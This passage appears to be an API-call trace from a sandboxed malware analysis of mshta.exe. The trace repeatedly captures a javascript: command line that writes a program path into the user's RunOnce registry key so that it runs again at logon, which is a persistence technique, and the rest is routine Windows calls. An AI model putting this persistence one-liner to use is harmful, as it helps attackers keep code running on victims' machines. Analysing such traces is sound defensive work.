(lpModuleName="advapi32") returned 0x77710000 [0065.183] GetProcAddress (hModule=0x77710000, lpProcName="EventWrite") returned 0x77ca0c59 [0065.184] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0065.184] GetProcAddress (hModule=0x77710000, lpProcName="EventUnregister") returned 0x77c99241 [0065.184] EtwEventRegister () returned 0x0 [0065.184] EtwRegisterTraceGuidsW () returned 0x0 [0065.185] EtwRegisterTraceGuidsW () returned 0x0 [0065.185] EtwEventRegister () returned 0x0 [0065.187] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x33ef04 | out: lpdwHandle=0x33ef04) returned 0x0 [0065.188] GetModuleHandleW (lpModuleName=0x0) returned 0x970000 [0065.188] GetModuleFileNameW (in: hModule=0x970000, lpFilename=0x33ef10, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.188] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.192] GetCurrentProcessId () returned 0x7bc [0065.192] GetCurrentProcessId () returned 0x7bc [0065.194] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0065.194] GetLastError () returned 0x0 [0065.268] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0x100 [0065.268] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x120000 [0065.271] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x200e78 | out: hHeap=0x200000) returned 1 [0065.271] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x200f88 | out: hHeap=0x200000) returned 1 [0065.271] RegCloseKey (hKey=0x42) returned 0x0 [0065.271] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0065.271] GetProcAddress (hModule=0x76d30000, lpProcName="RegisterApplicationRestart") returned 0x76d6b53c [0065.271] lstrlenA (lpString="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 255 [0065.271] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x0, Size=0x200) returned 0x200e78 [0065.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x762c22, cbMultiByte=-1, lpWideCharStr=0x200e78, cchWideChar=256 | out: lpWideCharStr="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 256 [0065.271] RegisterApplicationRestart (pwzCommandline="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", dwFlags=0x0) returned 0x0 [0065.271] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x200e78 | out: hHeap=0x200000) returned 1 [0065.272] GetProcAddress (hModule=0x74af0000, lpProcName="RunHTMLApplication") returned 0x74b4e710 [0065.275] GetCommandLineW () returned="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" [0065.280] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x204) returned 0x784010 [0065.280] OleInitialize (pvReserved=0x0) returned 0x0 [0065.330] IsWindow (hWnd=0x0) returned 0 [0065.330] RegisterClassW (lpWndClass=0x33f7bc) returned 0xc059 [0065.330] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x6011a [0065.331] NtdllDefWindowProc_W () returned 0x0 [0065.331] NtdllDefWindowProc_W () returned 0x1 [0065.333] NtdllDefWindowProc_W () returned 0x0 [0065.824] NtdllDefWindowProc_W () returned 0x0 [0065.824] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x6011a, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x3027a [0065.824] NtdllDefWindowProc_W () returned 0x0 [0065.824] NtdllDefWindowProc_W () returned 0x1 [0065.824] NtdllDefWindowProc_W () returned 0x0 [0065.825] NtdllDefWindowProc_W () returned 0x0 [0065.825] SetWindowLongW (hWnd=0x3027a, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.826] NtdllDefWindowProc_W () returned 0x0 [0065.827] NtdllDefWindowProc_W () returned 0x0 [0065.827] SetWindowPos (hWnd=0x3027a, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0065.827] NtdllDefWindowProc_W () returned 0x0 [0065.827] NtdllDefWindowProc_W () returned 0x0 [0065.828] NtdllDefWindowProc_W () returned 0x0 [0065.828] NtdllDefWindowProc_W () returned 0x0 [0065.829] NtdllDefWindowProc_W () returned 0x0 [0065.829] SendMessageW (hWnd=0x3027a, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0065.829] NtdllDefWindowProc_W () returned 0x0 [0065.830] NtdllDefWindowProc_W () returned 0x0 [0065.830] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x204) returned 0x78b718 [0065.830] PathRemoveArgsW (in: pszPath="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" | out: pszPath="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") [0065.830] PathRemoveBlanksW (in: pszPath="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" | out: pszPath="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") [0065.830] PathUnquoteSpacesW (in: lpsz="\"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"" | out: lpsz="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);") returned 1 [0065.831] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppmk=0x33f81c*=0x0, dwFlags=0x1 | out: ppmk=0x33f81c*=0x78af40) returned 0x0 [0065.846] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78b718 | out: hHeap=0x760000) returned 1 [0065.847] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78ba60 [0065.847] CoCreateInstance (in: rclsid=0x74c29770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x750296d4 | out: ppv=0x750296d4*=0x794ec0) returned 0x0 [0065.848] DllGetClassObject (in: rclsid=0x792280*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ead4 | out: ppv=0x33ead4*=0x75028cb0) returned 0x0 [0065.848] IClassFactory:CreateInstance (in: This=0x75028cb0, pUnkOuter=0x0, riid=0x33f480*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33eac0 | out: ppvObject=0x33eac0*=0x794ec0) returned 0x0 [0065.848] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2a8) returned 0x794438 [0065.849] GetCurrentThreadId () returned 0x544 [0065.965] RegisterClassExW (param_1=0x33e96c) returned 0xc16a [0065.965] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc16a, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x74af0000, lpParam=0x0) returned 0x20280 [0065.966] GetWindowLongW (hWnd=0x20280, nIndex=-20) returned 0 [0065.966] NtdllDefWindowProc_W () returned 0x1 [0065.966] NtdllDefWindowProc_W () returned 0x0 [0065.966] NtdllDefWindowProc_W () returned 0x0 [0065.967] NtdllDefWindowProc_W () returned 0x0 [0065.967] NtdllDefWindowProc_W () returned 0x0 [0065.967] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78ba78 [0065.967] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78ba90 [0065.967] CreateCompatibleDC (hdc=0x0) returned 0x3010a0d [0065.967] GetDeviceCaps (hdc=0x3010a0d, index=90) returned 96 [0065.967] GetDeviceCaps (hdc=0x3010a0d, index=88) returned 96 [0065.967] GetSystemMetrics (nIndex=68) returned 4 [0065.967] GetSystemMetrics (nIndex=69) returned 4 [0065.967] GetSystemMetrics (nIndex=2) returned 17 [0065.967] GetSystemMetrics (nIndex=3) returned 17 [0065.968] GetStockObject (i=13) returned 0x18a002e [0065.968] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x18a002e [0065.968] GetTextMetricsW (in: hdc=0x3010a0d, lptm=0x33ea04 | out: lptm=0x33ea04) returned 1 [0065.968] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x18a002e [0065.968] DeleteObject (ho=0x18a002e) returned 1 [0065.968] GetSystemDefaultLCID () returned 0x409 [0065.968] GetUserDefaultLCID () returned 0x409 [0065.968] GetACP () returned 0x4e4 [0065.968] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x33e978, cchData=41 | out: lpLCData="1") returned 2 [0065.968] _wtoi (_String="1") returned 1 [0065.968] RegCloseKey (hKey=0x0) returned 0x6 [0065.968] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x33e9cc, cchData=16 | out: lpLCData="0123456789") returned 11 [0065.968] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7502b038, fWinIni=0x0 | out: pvParam=0x7502b038) returned 1 [0065.968] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x33ea40, fWinIni=0x0 | out: pvParam=0x33ea40) returned 1 [0065.968] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc0) returned 0x7947f0 [0065.968] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78baa8 [0065.969] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xa4) returned 0x7948b8 [0065.969] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783610 [0065.969] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1c) returned 0x790400 [0065.969] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779328 [0065.969] GetSystemWindowsDirectoryW (in: lpBuffer=0x33e84c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0065.969] lstrlenW (lpString="C:\\Windows") returned 10 [0065.969] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0065.969] CreateActCtxW (pActCtx=0x33e828) returned 0x79496c [0065.971] ActivateActCtx (in: hActCtx=0x79496c, lpCookie=0x33e7f8 | out: hActCtx=0x79496c, lpCookie=0x33e7f8) returned 1 [0065.971] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x754a0000 [0065.976] DeactivateActCtx (dwFlags=0x0, ulCookie=0x11af0001) returned 1 [0065.977] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0065.977] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0065.977] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0065.978] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0065.978] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x33e458, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.978] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33e660, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.978] GetCurrentProcess () returned 0xffffffff [0065.978] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x33e868, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0065.978] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.978] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783630 [0065.978] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0065.978] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x33e444, pvData=0x33e450, pcbData=0x33e44c*=0x4 | out: pdwType=0x33e444*=0x0, pvData=0x33e450, pcbData=0x33e44c*=0x4) returned 0x2 [0065.979] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e3bc | out: phkResult=0x33e3bc*=0x168) returned 0x0 [0065.979] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33e3c0 | out: phkResult=0x33e3c0*=0x164) returned 0x0 [0065.979] RegOpenKeyExW (in: hKey=0x164, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x33e37c | out: phkResult=0x33e37c*=0x0) returned 0x2 [0065.980] RegOpenKeyExW (in: hKey=0x168, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x33e37c | out: phkResult=0x33e37c*=0x0) returned 0x2 [0065.980] RegCloseKey (hKey=0x0) returned 0x6 [0065.980] RegCloseKey (hKey=0x0) returned 0x6 [0065.980] RegCloseKey (hKey=0x168) returned 0x0 [0065.980] RegCloseKey (hKey=0x164) returned 0x0 [0065.980] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x97c) returned 0x794ec0 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x480) returned 0x795848 [0065.981] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.981] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.981] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.981] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x794cd0 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x794d28 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x795cd0 [0065.981] GetCurrentThreadId () returned 0x544 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bb68 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2c) returned 0x77d960 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x80) returned 0x795d28 [0065.981] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc169 [0065.981] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x783650 [0065.981] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0065.982] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x75028cd4, dwReserved=0x0 | out: ppSM=0x75028cd4*=0x795db0) returned 0x0 [0065.988] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x64) returned 0x78fc18 [0066.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x78fc88 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28) returned 0x77d278 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x14) returned 0x783670 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779378 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x7793c8 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x78fce0 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x64) returned 0x78fd48 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779418 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x78fdb8 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xec) returned 0x78fe20 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779468 [0066.092] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x7794b8 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779508 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x78ff18 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x796000 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x779558 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x44) returned 0x7795a8 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x90) returned 0x796068 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x140) returned 0x796100 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x78bfd8 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x28) returned 0x77d2a8 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x783690 [0066.093] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xd0) returned 0x78cc90 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x38) returned 0x794d80 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x796248 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x148) returned 0x796378 [0066.094] GetCurrentThreadId () returned 0x544 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x5c) returned 0x7964c8 [0066.094] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x18) returned 0x7836b0 [0066.094] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x33e76c | out: ppURI=0x33e76c*=0x78c42c) returned 0x0 [0066.095] IUri:GetPropertyDWORD (in: This=0x78c42c, uriProp=0x11, pdwProperty=0x33e754, dwFlags=0x0 | out: pdwProperty=0x33e754*=0x11) returned 0x0 [0066.095] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x7955f4, dwReserved=0x0 | out: ppSM=0x7955f4*=0x796530) returned 0x0 [0066.095] IInternetSecurityManager:SetSecuritySite (This=0x796530, pSite=0x7955fc) returned 0x0 [0066.095] IUnknown:AddRef (This=0x7955fc) returned 0x28 [0066.096] IUnknown:QueryInterface (in: This=0x7955fc, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33e724 | out: ppvObject=0x33e724*=0x795600) returned 0x0 [0066.096] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x796558 | out: ppvObject=0x796558*=0x0) returned 0x80004002 [0066.096] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x796554 | out: ppvObject=0x796554*=0x0) returned 0x80004002 [0066.096] IServiceProvider:QueryService (in: This=0x795600, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x796550 | out: ppvObject=0x796550*=0x0) returned 0x80004002 [0066.096] IUnknown:Release (This=0x795600) returned 0x0 [0066.096] IInternetSecurityManager:GetSecurityId (in: This=0x796530, pwszUrl="about:blank", pbSecurityId=0x33e7c0, pcbSecurityId=0x33e7b4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33e7c0*=0x61, pcbSecurityId=0x33e7b4*=0xf) returned 0x0 [0066.168] DllGetClassObject (in: rclsid=0x7922b4*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x33dd40*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33d3f8 | out: ppv=0x33d3f8*=0x75028c70) returned 0x0 [0066.168] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.169] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.169] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33dfbc | out: ppvObject=0x33dfbc*=0x75028c70) returned 0x0 [0066.169] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.169] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e17c | out: ppvObject=0x33e17c*=0x75028c7c) returned 0x0 [0066.169] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.169] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x783770, cchResult=0xc, pcchResult=0x33e1c4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x33e1c4*=0xc) returned 0x0 [0066.169] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x1c) returned 0x790798 [0066.171] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.171] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790798 | out: hHeap=0x760000) returned 1 [0066.171] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.172] DllGetClassObject (in: rclsid=0x7922b4*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e090 | out: ppv=0x33e090*=0x75028c70) returned 0x0 [0066.172] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33e17c | out: ppvObject=0x33e17c*=0x75028c7c) returned 0x0 [0066.172] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.172] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x783770, cchResult=0xc, pcchResult=0x33e1d4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33e1d4*=0x0) returned 0x800c0011 [0066.172] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.172] IUnknown:Release (This=0x75028c7c) returned 